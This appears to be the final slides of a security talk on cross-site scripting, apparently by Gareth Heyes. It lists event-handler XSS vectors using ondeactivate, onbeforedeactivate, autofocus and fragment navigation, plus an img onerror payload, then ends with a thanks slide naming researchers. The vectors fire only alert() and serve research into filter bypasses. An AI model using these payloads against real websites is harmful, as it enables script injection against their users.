• <xss ondeactivate=alert(1) id=x tabindex=1></xss><input id=y autofocus>
• <xss onbeforedeactivate=alert(1) id=x tabindex=1></a><input id=y autofocus>
• page.html#x
• page.html#y

59. Questions?
Thanks and shout outs to: James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski
@garethheyes
<img src=1 onerror="alert('Wait. What. IE/Edge')};while(true)sendMeToTheJSBlackHole();function lol(){">